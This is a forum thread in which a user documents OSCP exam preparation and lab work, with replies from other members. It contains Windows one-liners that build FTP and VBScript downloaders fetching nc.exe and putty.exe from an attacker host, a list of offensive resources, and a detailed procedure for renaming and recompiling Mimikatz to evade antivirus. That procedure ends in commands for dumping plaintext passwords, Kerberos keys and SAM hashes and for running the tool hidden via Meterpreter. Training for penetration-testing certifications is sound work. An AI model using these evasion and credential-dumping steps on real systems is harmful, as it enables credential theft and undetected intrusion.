    - I created a tool-set for downloading files to windows machines using various techniques for different platforms, using only default tools available on the target host. I would imagine that on most windows machines, tools like nc.exe won't be available so this will provide me with an easy way to transfer the files without requiring additional tools on the windows machine.
    - I've learnt that a Philips HD9240 Airfryer makes delicious, crispy fries! (I bought one last week)


    Over the last few weeks I've come to understand the importance of having a solid documenting methodology. I understand now just how easy it is to get lost in all the information out there. Spending a few days early on, perfecting my documentation system has been critical in keeping my gathered information categorized. I'm using the same major folder structure as per my post #6, and with almost 500 pages of documentation it's still easy to find information.


    I still have much to do before I can consider myself ready on the windows platform: Pre-compiling exploits, scripting, privilege escalation to name a few big ones. And that's just the Windows side of things, after Windows there is Linux, databases, web-servers etc... I am starting to understand how people can get bogged down in their progress.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    It's Saturday and another week has flown by. I've had to burn the midnight oil at work and I haven't been able to put in as much study time as I wanted. I did study every day though, just not the 3 hours I initially planned. I've modified my attack vector slightly, including public research in the passive recon step, and creating a new step for social engineering and client-side attacks. I still like the idea of having sub-folders with the various platforms so I've left that bit untouched. I started attaching my compiled exploits into my notebook, organized by platform. I haven't had a crash yet but I ensure I keep saving the notebook every 5-10 minutes, with a full notebook backup every 2-3 hours and at the end of each day. I decided to zip the exploits before attaching them, which allows me to double-click on an entry in my KeepNote notebook which will open the contents of the zip file (the exploit) in my 7-zip explorer-like window. I wasn't keen on double-clicking on executable exploits in KeepNote on my day-to-day desktop machine, even though I know they won't harm my machine since I coded them. I only pre-compiled exploits with bind shells privilege escalation exploits, and I ensured that all my exploits have easily swappable shell-codes. I have kept the sources of my exploits with detailed guides on how to compile on Kali for when I need reverse shells. I have come up with a naming convention which allows me to quickly search through the ever growing list of exploits and source codes I'm hoarding. Every script and piece of code starts with a note on how to compile, how to use and how to modify.

    Here are some of my Windows one-liners, these two methods can be used for any command that requires multiple lines, for instance when creating an FTP script or creating a visual basic script to download a file:

    set r=^&echo:&&(echo open 10.1.1.110 21%r%ftp%r%bin%r%GET nc.exe%r%bye) > ftp.txt&&ftp -s:ftp.txt
    or
    (for %t in ("open 10.1.1.110 21" ftp bin "GET nc.exe" bye) do @echo %~t) >ftp.txt&&ftp -s:ftp.txt

    Keep in mind that the Windows nc.exe tool has a limitation on the amount of data you can send per command. For instance, nc.exe will crash with the following one-liner because it is too long (it works in cmd.exe and other CLIs, just not via nc.exe):

    (for %t in ("strUrl = WScript.Arguments.Item(0)" "StrFile = WScript.Arguments.Item(1)" "Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0" "Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0" "Const HTTPREQUEST_PROXYSETTING_DIRECT = 1" "Const HTTPREQUEST_PROXYSETTING_PROXY = 2" "Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts" "Err.Clear" "Set http = Nothing" "Set http = CreateObject("WinHttp.WinHttpRequest.5.1")" "If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")" "If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")" "If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")" "http.Open "GET",strURL,False" "http.Send" "varByteArray = http.ResponseBody" "Set http = Nothing" "Set fs = CreateObject("Scripting.FileSystemObject")" "Set ts = fs.CreateTextFile(StrFile,True)" "strData = """ "strBuffer = """ "For lngCounter = 0 to UBound(varByteArray)" "ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1)))" "Next" "ts.Close") do @echo %~t) >wget.vbs && cscript wget.vbs http://10.1.1.110/putty.exe putty.exe
  • MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
    Nice write up so far. I'm sure you'll be able to pass the exam on the first pass.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    I signed up today! I enlisted with my work email, got an email on my work email with confirmation code, which I used to sign up. My account is being generated after which I will have to test out lab access. When this is confirmed, I will get the option to pay for the 90 days of labs and the exam. I'm really looking forward to starting the lab and I'm keen to see if my preparations will pay off. My goal is 100% of the lab machines owned.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    I have completed my sign up for the Penetration Testing with Kali (the required course to sit the OSCP exam).
    The process is as follows:
    - Sign up via offensive-security.com website with a non-public email address
    - Get an email from them shortly after with a registration link
    - Use the link in the email to reserve a starting date for the labs
    - Receive an email shortly after (within a day or so) with VPN details to test the VPN connection for up to 48hrs and a payment link
    - After verifying the VPN connection works, pay for the course using the payment link (within 72 hours)
    - Wait until the starting day

    So I received my VPN details to test the connection. I tested the connectivity and decided to run a quick nmap scan and to my surprise I was connected to the real lab... and I had 48 hours of play time! I wasn't going to let that go to waste, although if I had to sign up again I probably would have signed up on a Thursday so I had the whole weekend to play. I have a full-time job so I only had about 5 hours total in the labs, minus the time it took to set up the connection. So naturally, I decided to give it a go. My scan revealed many boxes with a fair amount of open ports: This was going to be good! The OffSec people had specified in the email which host ranges to scan, and my IP address was in the 192.168.14.x range. They mentioned I should be able to ping the x.x.x.220 IP address of my range, depending on which of the lab ranges I ended up in (random). The range though, is a /23. I tried pinging 192.168.14.220 and couldn't ping it but when I tried 192.168.15.220 I saw ping replies.

    So out came nmap as per my methodology explained in my earlier post:
    nmap -Pn -F -sSU -T5 -oX /root/192.168.15.200-254.xml 192.168.15.200-254 | grep -vE 'filtered|closed' > /root/quick_recon.txt

    This command took about 4 minutes to complete, and the open ports lit up like a Christmas tree. I didn't really have any idea or preference of which host to attack first, and seeing so many open ports on so many machines, I figured the simplest approach would be to start at the lowest IP and work my way up through the IP addresses.

    I started with the first IP address. After enumerating the host, I found a vulnerability I could exploit. I didn't want to use Metasploit for this because I would learn more doing things by hand first. I didn't start up my listener before I fired off my fumbled attempt to exploit and this resulted in a denial of service on the machine: I crashed it by accident and had no way to reset it. I didn't have a GUI panel available to reset hosts since I was only supposed to be testing the VPN connection.

    After this silly mistake I decided to change my attack methodology, mainly because I want to maximize my time in the labs and exploit every host: I will use Metasploit for mundane tasks like reverse shells, simple fire-and-forget exploits and uploading files through Meterpreter. After I complete the labs and if I still have time left, I will repeat the exploits by hand.

    I then moved on to the next host which I expect will require some form of brute-forcing. I was looking for something a little more meaty than building a word-list and running a brute force tool against a server so I proceeded to the next IP in the list. My next target was called Bob, and I had a great time breaking into Bob. I went to bed 2 hours later than I had planned to, I just couldn't get myself to go to bed knowing I could solve this puzzle. My persistence paid off, and after about 3 hours of puzzling and taking notes and screenshots, Bob was mine.. and it felt great! I looted the box, left behind the digital equivalent of graffiti (a "Jollyfrogs.txt" file with some words of wisdom) and logged off from the VPN, tired but extremely satisfied.

    Being the first host I exploited to system/root level, it certainly will be a name I will remember. I didn't have time to look at other hosts but Bob made me realize that my generic approach works which is a relief.

    My exam starts Sunday the 21st of June (next week) and I'm excited to start!
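    The scan above writes an XML report with -oX while the normal text output goes through the grep. As an added example (not code from JollyFrogs' post), here is a small Python parser for that XML file which lists only the ports nmap reports as open, which is the same filtering the grep is trying to do but without depending on the exact wording of the text output. The XML below is a constructed sample in the shape nmap produces, not a real lab scan result; UDP scans often report "open|filtered" when nothing answered, so the parser treats that state separately.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output (not a real lab scan result). It mimics
# the shape nmap writes: a <host> per target with <address> and a <ports> list
# whose <state> carries open / closed / filtered / open|filtered.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -F -sSU -oX scan.xml 192.168.15.200-201">
  <host>
    <status state="up"/>
    <address addr="192.168.15.200" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.15.201" addrtype="ipv4"/>
    <ports>
      <port protocol="udp" portid="161"><state state="open"/><service name="snmp"/></port>
      <port protocol="udp" portid="69"><state state="open|filtered"/><service name="tftp"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text, include_ambiguous=False):
    """Return {ip: [(protocol, port, service), ...]} for ports nmap reports open.

    UDP scans frequently report "open|filtered" because no reply was received;
    those ports are only included when include_ambiguous is True.
    """
    wanted = {"open"}
    if include_ambiguous:
        wanted.add("open|filtered")
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        found = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") not in wanted:
                continue
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            found.append((port.get("protocol"), int(port.get("portid")), name))
        if found:
            result[addr.get("addr")] = sorted(found)
    return result


def quick_recon_lines(xml_text):
    """Render the open-port summary as one 'ip proto/port service' line per
    port, in the spirit of the quick_recon.txt file the scan above produces."""
    lines = []
    for ip, ports in sorted(open_ports(xml_text).items()):
        for proto, port, name in ports:
            lines.append(f"{ip} {proto}/{port} {name}")
    return lines


if __name__ == "__main__":
    # Usage: parse the constructed sample; for a real run, read the -oX file
    # instead, e.g. open_ports(open("/root/scan.xml").read())
    print("\n".join(quick_recon_lines(SAMPLE_NMAP_XML)))
```

    Run against the sample, the report lists tcp/22 and tcp/80 on the first host and udp/161 on the second; the filtered and closed ports are dropped, and udp/69 only appears when include_ambiguous is set.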
  • MrAgentMrAgent Member Posts: 1,310 ■■■■■■■■□□
    Good thread so far. Keep it up!
    How much time did you sign up for?
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    MrAgent wrote: »
    Good thread so far. Keep it up!
    How much time did you sign up for?

    Hi MrAgent, I signed up for 90 days.
  • the_Grinchthe_Grinch Member Posts: 4,165 ■■■■■■■■■■
    Awesome posts! Let me just commend you on all the work you have done prior to signing up. What's your background?
    WIP:
    PHP
    Kotlin
    Intro to Discrete Math
    Programming Languages
    Work stuff
  • JoJoCal19JoJoCal19 Mod Posts: 2,835 Mod
    This thread is great! Thanks for all of the info JollyFrogs. Also like the_Grinch, I'd like to know what your background is. Also if it wouldn't be too much trouble, can you list the sources, links, book names, you used to learn these pre-sign up skills? It would be beneficial to myself and others looking at the OSCP.
    Have: CISSP, CISM, CISA, CRISC, eJPT, GCIA, GSEC, CCSP, CCSK, AWS CSAA, AWS CCP, OCI Foundations Associate, ITIL-F, MS Cyber Security - USF, BSBA - UF, MSISA - WGU
    Currently Working On: Python, OSCP Prep
    Next Up:​ OSCP
    Studying:​ Code Academy (Python), Bash Scripting, Virtual Hacking Lab Coursework
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    the_Grinch wrote: »
    Awesome posts! Let me just commend you on all the work you have done prior to signing up. What's your background?
    JoJoCal19 wrote: »
    This thread is great! Thanks for all of the info JollyFrogs. Also like the_Grinch, I'd like to know what your background is. Also if it wouldn't be too much trouble, can you list the sources, links, book names, you used to learn these pre-sign up skills? It would be beneficial to myself and others looking at the OSCP.

    Hi The_Grinch and JoJoCal19, I started using computers when I was 7 when my dad bought a Commodore 64 for the family. Although a family gift, none of my family members were interested in computers so I had plenty of time to get acquainted with BASIC and of course play the many games that I was trading with friends. There was no internet back in the day and most programs would be loaded from music cassettes (magnetic tape is still used today to store information, for instance in DLT tapes). I remember tuning in to radio shows that broadcast code which you could record onto cassette and then load into the computer. We're talking WarGames era here where internet connections still made beeping and screeching noises. Of course my parents never allowed me to use the phone line so I was limited to one-way traffic from the public radio stations to my dad's Pioneer radio system.

    The above might make me sound old but I'm only 38 (I guess that statement is relative) and have worked with computers my whole life. When I was 20 I was poached by a large corporation to work on IBM Mainframes. This was in the late 1990's and it was a time of plenty, back then companies would hire anyone to work on computers due to a global shortage of IT staff. I started off in the "Tape Setup" department which was a large library of magnetic DLT tapes, and we would be working 24-hour shifts around the clock, watching 3 screens with "batch job requests", essentially tape ID numbers, and run to the correct tape readers to insert these tapes. I have fond memories of Tape Setup. The Tape Setup also served as a prospective pool of future Mainframe operators, and after a few weeks there was an opening as a Mainframe operator in the systems team. I applied and was hired. I worked with mainframes in shifts for around a year and was poached internally by a visionary manager who had just started the "Windows NT department". Our mainframe computer terminals were being replaced by NT workstations at a very fast pace and their department couldn't keep up. I got a job as an NT server administrator. They gave me an MCSE NT 4.0 course and I certified. Shortly after, I was among the first people in the world to certify for Windows 2000 (The only reason I know this is because I received a signed "early achiever" reward from Bill Gates). My manager allowed me to study almost non-stop as long as I kept the servers running. I was responsible for about 70 Windows NT servers, and they all ran like clockwork, so I had plenty of time to study.

    (Shortening the story a bit here) After a few years in the Windows server department, I realized that my days as a server administrator would soon be coming to an end as more and more of our systems support was being outsourced to India. As Darwin once said, "It is not the strongest species that survives, but the most adaptable". So I got Cisco certifications and applied for a job in networks support, which I did for a few years. When networking started to get off-shored and outsourced, and with the rise of "the cloud" which virtualizes most of the networking equipment I was supporting, I got into security. Security came naturally to me as most of my setups would take it into account, and having a broad basis of systems knowledge and networks really helped ease the learning curve. I got CISSP certified, did some contracting and freelancing and have settled in an information security job in Brisbane for about a year now. I'm enjoying security and believe this will be my last career switch, having switched twice within the IT field.

    Over the years I have gotten quite a few certifications, partly thanks to employers who saw the benefit in training their staff but mostly because I self-study at home almost every day - I enjoy it and I crave it. My list of certifications includes CCNP, CCDP, CCVP, MCSE, MCDBA, CISSP (the list is quite extensive but those would be my preferred ones; the ones I learnt most from or have gotten most value out of during my career). Every 2 years I get another Cisco certification simply to keep my certs active, the Windows certifications don't expire and I need 40 CPE points per year for my CISSP accreditation. Unfortunately the value of these certifications has dropped significantly with the rise of brain-dumping sites. And that is why I'm doing OSCP now! It's hands-on. No cheating and no brain-dumping: This is a journey that people take alone. This is the "Camino de la Sabatera" of the IT certifications: I will value this certificate more than any of the ones I have gotten so far (except perhaps my early achievers award from Bill Gates!). I have learnt so much already even before starting the course.

    Overall I would rate my knowledge coming into the OSCP studies as follows:
    Networks = excellent
    Microsoft = excellent
    Linux = moderate
    Coding = moderate
    Scripting = moderate
    Security (theory) = moderate
    Security (practical) = moderate
    Assembly = low
    Python = zero
    Linux Kali = zero
    Metasploit = zero

    I will list the resources I used to get up to speed in a separate reply. I'm on 904 pages of notes so far in KeepNote so I will just get the most important links that I used.

    EDIT: I posted the links, but I guess the sheer volume of URLs resulted in the post being marked for review by a moderator. If it doesn't get approved - which due to the hackish nature of some of the links is completely understandable - then I will post a pastebin link instead.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    As requested, here is a non-exhaustive list of resources I have used so far. Please keep in mind that some of these links have hundreds or thousands of links in them, most of which I would have read. A good resource to start out is the very first link on this website, which has hundreds of interesting links.

    Be warned: This rabbit hole goes deep.

    Interesting reading:
    https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList
    http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
    https://blog.netspi.com/netspis-top-cracked-passwords-for-2014/
    https://github.com/SpiderLabs/Responder
    http://windowssecrets.com/top-story/
    http://resources.infosecinstitute.com/in-depth-seh-exploit-writing-tutorial-using-ollydbg/
    https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
    http://jbremer.org/mona-101-a-global-samsung-dll/
    http://sgros-students.blogspot.sg/2014/09/immunity-debugger-basics-part-1.html
    http://sgros-students.blogspot.sg/2014/09/immunity-debugger-basics-part-2.html
    http://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/
    http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
    http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html
    http://withinwindows.com/2009/02/05/list-of-windows-7-beta-build-7000-auto-elevated-binaries/
    https://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/
    http://security.stackexchange.com/questions/54324/should-i-worry-about-this-uac-bypass-exploit-for-windows-7
    http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/
    http://hackerforhire.com.au/
    http://n01g3l.tumblr.com/
    http://veneetbhardwaj.blogspot.sg/
    http://nethekk.blogspot.sg/2014/01/slmail-exploit.html
    https://github.com/samratashok/nishang
    http://j3rge.blogspot.sg/
    https://twitter.com/ithurricanept
    https://github.com/hfiref0x
    http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
    https://zdresearch.com/internet-explorer-version-detect-rop-genration/
    http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html
    http://woshub.com/how-to-extract-windows-user-passwords-from-hiberfil-sys/
    http://rycon.hu/papers/goldenticket.html
    http://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html


    Exploit and vulnerability databases:
    http://www.exploit-db.com
    https://code.google.com/p/google-security-research/issues/list?can=1&q=&colspec=ID+Type+Status+Priority+Milestone+Owner+Summary&cells=tiles
    http://packetstormsecurity.com/files/os/7
    https://packetstormsecurity.com/
    http://farlight.org/index.html?type=local


    Restricted shell escape:
    https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/


    Privilege Escalation:
    http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
    https://blog.netspi.com/windows-privilege-escalation-part-1-local-administrator-privileges/
    https://blog.netspi.com/windows-privilege-escalation-part-2-domain-admin-privileges/
    http://www.fuzzysecurity.com/tutorials/16.html
    https://www.youtube.com/watch?v=kMG8IsCohHA
    http://www.greyhathacker.net/?p=738
    http://harmj0y.net
    http://www.tarasco.org/


    ROP: ASLR and DEP/NX:
    https://www.trustwave.com/Resources/SpiderLabs-Blog/Baby-s-first-NX-ASLR-bypass/
    http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx
    http://en.wikipedia.org/wiki/Return-oriented_programming
    http://www.mastropaolo.com/2005/06/04/buffer-overflow-attacks-bypassing-dep-nxxd-bits-part-1/
    https://samsclass.info/127/proj/rop.htm
    http://nicholas.carlini.com/papers/2014_usenix_ropattacks.pdf
    https://ctf-team.vulnhub.com/picoctf-2014-hardcore-rop/


    Boot to root websites:
    https://exploit-exercises.com/
    http://0daysecurity.com/pentest.html
    http://blog.agupieware.com/2014/10/hack-lab-part-3-installing-victim.html


    Pentesting blogs:
    https://idzer0.com


    Reconnaissance websites:
    http://whois.domaintools.com/nextdc.com


    Shell codes:
    https://www.exploit-db.com/shellcode/
    http://www.secdev.org/projects/shellforge/
    https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
    http://www.leidecker.info/downloads/index.shtml#shells
    https://github.com/dotcppfile/Serbot
    http://shell-storm.org/shellcode/
    http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html


    Tools to hide Shells:
    https://www.veil-framework.com/


    EggHunters:
    http://www.primalsecurity.net/0x8-exploit-tutorial-the-elusive-egghunter/


    Exploit Development:
    https://github.com/SaltwaterC/sploit-tools
    https://github.com/r41p41/snippets
    https://zdresearch.com/internet-explorer-version-detect-rop-genration/
    https://github.com/byt3bl33d3r/MITMf
    https://www.qualys.com/research/top10/2014/07/


    Password leaks/lists:
    http://www.leakedin.com
    http://securityxploded.com/passwordsecrets.php


    OSCP reviews:
    http://popped.io


    Hash cracking:
    http://forum.insidepro.com/viewforum.php?f=31&sid=b162ba8467cf30221b72f1dc23055572
    http://www.hashkiller.co.uk
  • justjenjustjen Member Posts: 77 ■■□□□□□□□□
    JollyFrogs, I have been following your adventures in preparing for the OSCP with great interest and enjoyment. Your posts are always a good read, both informational and amusing. I look forward to following your continued adventures, and have been inspired to start my own journey, now in the early getting ready stage. Good luck in this exciting trip! :)
  • veritas_libertasveritas_libertas Member Posts: 5,746 ■■■■■■■■■■
    Great stuff! Keep it coming :) I'm sure you will pass.
  • JollyFrogsJollyFrogs Member Posts: 97 ■■■□□□□□□□
    Bob was a great experience, one thing was bugging me though: When I ran mimikatz "it didn't work". No output, nothing. The command ran then exited without errors. I now know that the desktop must have been full of error dialogs, let's hope Bob wasn't using his computer when I did.

    I had compiled mimikatz from source, and I wondered if that might have broken something. So I fired up a Windows XP SP0 machine and tried the pre-compiled mimikatz version from the inter-webs. Sure thing, the program worked flawlessly. I then ran my compiled version - which I thought should be identical - and when executing mimikatz I got an error screen on the desktop stating a "DecodePointer" function in Kernel32.dll couldn't be found. I did some research on this error and learnt that the DecodePointer function was only added to kernel32.dll after Windows SP2: Mystery solved! I added the DecodePointer function to the solution, built it, fired up mimikatz on my Windows XP SP0 machine and it worked.

    A minor inconvenience was that my antivirus would pick up Mimikatz as malware and delete the file. I proceeded to change the mimikatz code very slightly and I've come up with a version that my antivirus doesn't detect (yet) as a virus. I've attached the complete procedure below in case someone wants to compile Mimikatz from source and runs into the same issue:

    Author: JollyFrogs, Brisbane
    NOTE: Disable all virus-scanners before you start downloading, keep them disabled until your files are compiled


    Get the required programs and files:
    Download: https://github.com/gentilkiwi/mimikatz/archive/master.zip (Free)
    Download: GRMWDK_EN_7600_1.ISO from Microsoft (Free)
    Download: vs2013.4_ce_enu.iso from Microsoft (Free)
    Download: fnr.exe from https://findandreplace.codeplex.com/downloads/get/809617
    Download: http://mulder.googlecode.com/svn/trunk/Utils/EncodePointerLib/Release/EncodePointer.lib (you can optionally compile it from source)


    Install Driver Development Toolkit:
    Extract GRMWDK_EN_7600_1.ISO with 7-zip
    Run KitSetup.exe
    - Click Yes to start the installation
    - Tick "Full Development Environment" and leave all other options unticked
    - Click "OK" in the bottom right
    - Install path: C:\WinDDK\7600.16385.1\
    - Click "OK" in the bottom right
    - Tick "I Agree" in the bottom left and click "OK"
    NOTE: The installation commences
    - Click "Finish" in the "Microsoft WDK Install Progress" screen


    Install Visual Studio 2013 Community Edition:
    Extract vs2013.4_ce_enu.iso with 7-zip
    Run vs_community.exe
    - Click "Continue" if you get a setup warning
    - Install path: C:\Program Files (x86)\Microsoft Visual Studio 12.0\
    - Tick "I agree to the License Terms and Privacy Policy."
    - Untick "Join the Visual Studio Experience Improvement Program"
    - Click "Next"
    - Tick and then untick "Select All" to select nothing
    - Click "INSTALL"
    - Click "Yes" to close the UAC warning screen
    NOTE: the installation commences
    - Click "LAUNCH" after install completes
    - Click "Not now, maybe later." in the Welcome screen
    - Select "General" and Select "Blue" and Click "Start Visual Studio"


    Prevent AV detection on Mimikatz:
    Extract mimikatz-master.zip to C:\jollykatz\ (you should end up with "C:\jollykatz\mimikatz-master\mimikatz.sln" and a whole bunch of files/folders)


    run the following in a cmd.exe to rename all files and folders from "mimi" to "jolly":
    powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*mimi*\" -Recurse | Rename-Item -NewName {$_.name -replace 'mimi','jolly' }}"
    powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*kuhl*\" -Recurse | Rename-Item -NewName {$_.name -replace 'kuhl','frog' }}"


    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories"
    File Mask: *.*
    Find: mimi
    replace: jolly
    Click "replace"
    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories"
    File Mask: *.*
    Find: kuhl
    replace: frog
    Click "replace"
    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories"
    File Mask: *.*
    Find: eo.oe.kiwi :)
    replace: THINC.local
    Click "replace"
    Close fnr.exe


    Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\Win32
    Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\x64
    NOTE: We're adding "EncodePointer.lib" because WinXP SP0/SP1 would error out with a DecodePointer error caused by compiling with VS2013


    Now we'll build "Jollykatz":
    - Double-click on "C:\jollykatz\jollykatz-master\jollykatz.sln"
    NOTE: Visual Studio Community Edition opens your project


    - In the "Solution Explorer" window on the right, expand "global files" -> "lib" -> right-click on "Win32" and select "Add" -> "Existing Item"
    - Choose "C:\jollykatz\jollykatz-master\lib\Win32\EncodePointer.lib"
    - In the "Solution Explorer" window on the right, expand "global files" -> "lib" -> right-click on "x64" and select "Add" -> "Existing Item"
    - Choose "C:\jollykatz\jollykatz-master\lib\x64\EncodePointer.lib"


    - In the "Solution Explorer" window on the right, right-click on "jollykatz" (might have to scroll to bottom) and select "Properties"
    - Expand "Configuration Properties" -> "General" -> Set "Use of MFC" to "Use Standard Windows Libraries"
    - Click "Apply" in the bottom
    - Expand "Configuration Properties" -> "C/C++" -> "Code Generation" -> Set "Runtime Library" to "Multi-threaded (/MT)"
    - Click "Apply" in the bottom
    - Expand "Configuration Properties" -> "Linker" -> "Input" -> Add "EncodePointer.lib;" at the start of "Additional Dependencies" (in front of "advapi32.lib")
    - Click "OK" in the bottom


    - In the top menu bar, click "Build" -> "Rebuild Solution"
    NOTE: You should see "Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped"
    NOTE: This means that the 32-bit build succeeded!


    - In the top bar, next to "Release", change "Win32" to "x64"
    - In the top menu bar, click "Build" -> "Rebuild Solution"
    NOTE: You should see "Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped"
    NOTE: This means that the 64-bit build succeeded!


    NOTE: You should now see 5 files in the C:\jollykatz\jollykatz-master\Win32\ directory, of which you will need 3:
    - jollykatz.exe
    - jollylib.dll
    - jollydrv.sys
    NOTE: You should see the same file structure in the C:\jollykatz\jollykatz-master\x64\ directory


    Copy and rename C:\jollykatz\jollykatz-master\Win32\jollykatz.exe to C:\jollykatz\jollykatz32.exe
    Copy and rename C:\jollykatz\jollykatz-master\x64\jollykatz.exe to C:\jollykatz\jollykatz64.exe
    NOTE: Typically, you only need jollykatz.exe, the driver (jollydrv.sys) and library (jollylib.dll) files are optional. If you need the drivers, copy and rename them as well.


    NOTE: Hopefully, your antivirus won't pick up on the new jollykatz.exe files. If it does, you'll need to modify some code. Or use the Veil framework.


    Run Mimikatz from memory through meterpreter (advisable):
    execute -H -i -c -m -d calc.exe -f jollykatz.exe -a '"privilege::debug" "sekurlsa::logonPasswords full" "exit"'


    How to use:


    -- **** clear-text passwords from LSASS process:
    C:\> jollykatz32.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"


    -- Steal users credentials until they reset their passwords:
    C:\> jollykatz32.exe "privilege::debug" "sekurlsa::ekeys" "exit"


    -- **** LM and NTLM hashes from SAM:
    C:\> jollykatz32.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"


    -- read SAM file from /repair or ntbackup files:
    C:\> reg save HKLM\SYSTEM SystemBkup.hiv
    C:\> reg save HKLM\SAM SamBkup.hiv
    (Or use Volume Shadow Copy / BootCD to backup these files or get them from the repair folder:)
    C:\Windows\System32\config\SYSTEM
    C:\Windows\System32\config\SAM
    C:\> jollykatz32.exe "lsadump::sam SystemBkup.hiv SamBkup.hiv" "exit"